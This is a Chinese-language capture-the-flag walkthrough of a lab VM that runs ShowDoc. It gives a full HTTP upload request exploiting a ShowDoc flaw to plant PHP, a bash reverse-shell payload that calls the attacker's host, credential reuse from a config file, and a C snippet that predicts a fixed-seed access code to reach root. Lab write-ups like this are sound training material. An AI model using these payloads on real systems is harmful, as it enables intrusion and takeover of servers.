关联:靶机记录常用命令提权总览

主机发现

┌──(kali㉿kali)-[~/桌面]
└─$ nmap -sn 10.241.108.0/24
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-28 16:51 CST
Nmap scan report for 10.241.108.8
Host is up (0.0012s latency).
MAC Address: 08:00:27:35:21:83 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap scan report for 10.241.108.43
Host is up (0.011s latency).
MAC Address: 4E:20:31:25:4A:3C (Unknown)
Nmap scan report for 10.241.108.212
Host is up (0.00060s latency).
MAC Address: 30:E3:A4:48:AC:29 (Unknown)
Nmap scan report for 10.241.108.201
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 8.08 seconds

确定靶机ip:10.241.108.8(后来发现给了ip)

端口扫描

┌──(kali㉿kali)-[~/桌面]
└─$ nmap   10.241.108.8 
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-28 16:54 CST
Nmap scan report for 10.241.108.8
Host is up (0.0045s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:35:21:83 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
 
Nmap done: 1 IP address (1 host up) scanned in 0.62 seconds
                                                             
  • 存在80-web端口

web渗透

发现了web就先访问了一下 发现是一个ShowDoc的网站,应该是一套通用的源码。直接问ai了。 找到了cve直接去搜poc了。 vulhub/showdoc/CNVD-2020-26585 在主节点 ·vulhub/vulhub ·GitHub poc:

POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0RdOKBR8AmAxfRyl
Content-Length: 213
 
------WebKitFormBoundary0RdOKBR8AmAxfRyl
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
Content-Type: text/plain
 
<?=phpinfo();?>
------WebKitFormBoundary0RdOKBR8AmAxfRyl--

改一下host发包 果然得到路径 漏洞存在,接下来可以反弹shell了。

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvp 7777       
listening on [any] 7777 ...
 
替换payload为:
<?php exec('bash -c "bash -i >& /dev/tcp/10.241.108.201/7777 0>&1" &'); ?>
 
 

上传后访问得到的url就可以看到shell反弹了

user提权

我们现在只有最低的www权限 所以先看一下用户,

www-data@Show:~/html/Sqlite$ ls -l /home
ls -l /home
total 8
drwx------ 2 l1qin9 l1qin9 4096 Apr 25 22:47 l1qin9
drwx------ 2 mooi   mooi   4096 Apr 25 20:09 mooi
 

有两个用户,都是一样的权限。

然后翻一翻目录,找到了一个/html/Sqlite/showdoc.db.php sqlite的数据库文件,我们看看会不会在数据库中保存了账号密码 起一个python服务,下载下来到Navicat看看。

#靶机shell:
www-data@Show:~/html/Sqlite$ python3 -m http.server 8080
python3 -m http.server 8080
#本机shell:
PS D:\webtool\Dirsearch> curl http://10.241.108.8:8080/showdoc.db.php -O "showdoc.db.php"

打开能看到我自己的用户和一个showdoc目录,但是可惜密码是哈希加密的,cmd5也没爆出来 只能继续去找了,我们找一找配置文件

www-data@Show:~/html$ find . -name "*conf*"   
find . -name "*conf*"
./web_src/test/e2e/nightwatch.conf.js
./web_src/test/unit/jest.conf.js
./web_src/build/webpack.base.conf.js
./web_src/build/webpack.prod.conf.js
./web_src/build/webpack.dev.conf.js
./web_src/build/vue-loader.conf.js
./web_src/config
./web_src/.editorconfig
./server/Application/Common/Conf/config.php
./server/Application/Api/Conf/config.php
./server/Application/Home/Conf/config.php
 

先看的几个php文件。

www-data@Show:~/html$ cat server/Application/Common/Conf/config.php
cat server/Application/Common/Conf/config.php
<?php
return array(
    //'配置项'=>'配置值'
    //使用sqlite数据库
    'DB_TYPE'   => 'Sqlite', 
    'DB_NAME'   => '../Sqlite/showdoc.db.php', 
    //showdoc不再支持mysql http://www.showdoc.cc/help?page_id=31990
    'DB_HOST'   => 'localhost',
    'DB_USER'   => 'showdoc', 
    'DB_PWD'    => 'showdoc123456',
    'DB_PORT'   => 3306, // 端口
    'DB_PREFIX' => '', // 数据库表前缀
    'DB_CHARSET'=> 'utf8', // 字符集
    'DB_DEBUG'  =>  TRUE, // 数据库调试模式 开启后可以记录SQL日志
    'URL_HTML_SUFFIX' => '',//url伪静态后缀
    'URL_MODEL' => 3 ,//URL兼容模式
    'URL_ROUTER_ON'   => true, 
    'URL_ROUTE_RULES'=>array(
        ':id\d'               => 'Home/Item/show?item_id=:1',
        ':domain\s$'               => 'Home/Item/show?item_domain=:1',//item的个性域名
        'uid/:id\d'               => 'Home/Item/showByUid?uid=:1',
        'page/:id\d'               => 'Home/Page/single?page_id=:1',
    ),
    'URL_CASE_INSENSITIVE'=>true,
    'SHOW_ERROR_MSG'        =>  true,    // 显示错误信息,这样在部署模式下也能显示错误
    'STATS_CODE' =>'',  //可选,统计代码
    'TMPL_CACHE_ON' => false,//禁止模板编译缓存
    'HTML_CACHE_ON' => false,//禁止静态缓存
    'TMPL_EXCEPTION_FILE' => '../Public/exception.tpl' , //错误模版
    //上传文件到七牛的配置
    'UPLOAD_SITEIMG_QINIU' => array(
                    'maxSize' => 5 * 1024 * 1024,//文件大小
                    'rootPath' => './',
                    'saveName' => array ('uniqid', ''),
                    'driver' => 'Qiniu',
                    'driverConfig' => array (
                            'secrectKey' => '', 
                            'accessKey' => '',
                            'domain' => '',
                            'bucket' => '', 
                        )
                    ),
);

直接发现了showdoc用户的密码。我们尝试一下,看是否存在密码复用

┌──(kali㉿kali)-[~/桌面]
└─$ ssh mooi@10.241.108.8  
The authenticity of host '10.241.108.8 (10.241.108.8)' can't be established.
ED25519 key fingerprint is SHA256:MjoUe5ON03T2UcSPmlU3evmpGUywqf/3IUm0+1p77cI.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.241.108.8' (ED25519) to the list of known hosts.
mooi@10.241.108.8's password: 
Linux Show 6.12.73+deb13-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.73-1 (2026-02-17) x86_64
 
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Apr 25 07:14:32 2026 from 192.168.193.14
mooi@Show:~$ ls
user.txt
mooi@Show:~$ cat user.txt 
flag{user-f5ce64ad520f46e2bcb1dc94dbb6dbd3}
 

root提权

mooi用户发现user_flag.后就没什么东西了。然后来到另外一个l1qin9用户,发现一个可执行程序 第一想法是直接执行一下

l1qin9@Show:~$ ls
auth_monitor
l1qin9@Show:~$ ./auth_monitor 
--- MAZE-SEC ACCESS MONITOR ---
SYSTEM_TICK: 1777378524
CHALLENGE_STAMP: ccc20fe7
ENTER ACCESS CODE: 
 

要我填一个ACCESS CODE。这里要不就是爆破要不就是逆向。

逆向

依旧是启pythonweb,下载下来

l1qin9@Show:~$ python3 -m http.server 8081
 
PS D:\webtool\Dirsearch> curl http://10.241.108.8:8081/auth_monitor -O "auth_monitor"

拖入ida中f5反汇编:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v3; // ebx
  time_t v4; // rax
  char s[256]; // [rsp+10h] [rbp-130h] BYREF
  int v7; // [rsp+110h] [rbp-30h] BYREF
  unsigned int buf; // [rsp+114h] [rbp-2Ch] BYREF
  FILE *stream; // [rsp+118h] [rbp-28h]
  int v10; // [rsp+120h] [rbp-20h]
  int fd; // [rsp+124h] [rbp-1Ch]
  int i; // [rsp+128h] [rbp-18h]
  unsigned int v13; // [rsp+12Ch] [rbp-14h]
 
  fd = open("/dev/urandom", 0, envp);
  if ( fd < 0 )
  {
    v3 = time(0LL);
    buf = v3 ^ getpid();
  }
  else
  {
    read(fd, &buf, 4uLL);
    close(fd);
  }
  v13 = 0;
  for ( i = 0; i <= 99; ++i )
  {
    v13 += buf % (i + 1);
    v13 ^= **argv;
  }
  s0rand(v13);
  v10 = rand();
  puts("--- MAZE-SEC ACCESS MONITOR ---");
  v4 = time(0LL);
  printf("SYSTEM_TICK: %ld\n", v4);
  printf("CHALLENGE_STAMP: %08x\n", buf);
  printf("ENTER ACCESS CODE: ");
  if ( (unsigned int)__isoc99_scanf("%d", &v7) != 1 )
    return 1;
  if ( v10 == v7 )
  {
    setuid(0);
    setgid(0);
    stream = fopen("/root/show.txt", "r");
    if ( stream )
    {
      while ( fgets(s, 256, stream) )
        printf("%s", s);
      fclose(stream);
    }
  }
  else
  {
    puts("ACCESS DENIED.");
  }
  return 0;
}

大致分析一下就是:

  1. 经过一个复杂算法后得到v13
  2. 把v13传给s0rand函数
  3. 我们输入一个v7,一个伪随机数v10。v13是种子
  4. 如果随机数和我们的输入相同就会得到root密码 看起来很复杂,但是我们进入s0rand就会发现
void s0rand()
{
  srand(0x539u);
}

s0rand根本不接受参数,所以默认的种子就是0x539u。所以预测码很容易得到 exp:

#include <stdio.h>
#include <stdlib.h>
 
int main() {
    srand(0x539);
    printf("固定的预测码是: %d\n", rand());
    return 0;
}
 
//固定的预测码是: 292616681

我们按照一样的逻辑生成就好了。随便找一个在线c语言网站就好了。

l1qin9@Show:~$ ./auth_monitor
--- MAZE-SEC ACCESS MONITOR ---
SYSTEM_TICK: 1777378013
CHALLENGE_STAMP: b77f8146
ENTER ACCESS CODE: 292616681
1NOjcN9b9uqUJ0VPYbgi
 
 
l1qin9@Show:~$ su 
Password: 
root@Show:/home/l1qin9# ls
auth_monitor
root@Show:/home/l1qin9# cd /root
root@Show:~# ls
root.txt  show.txt
root@Show:~# cat root.txt
flag{root-64f26bcf00751fcbe2d03d5a7d7c93ef}
 

到这里就打穿了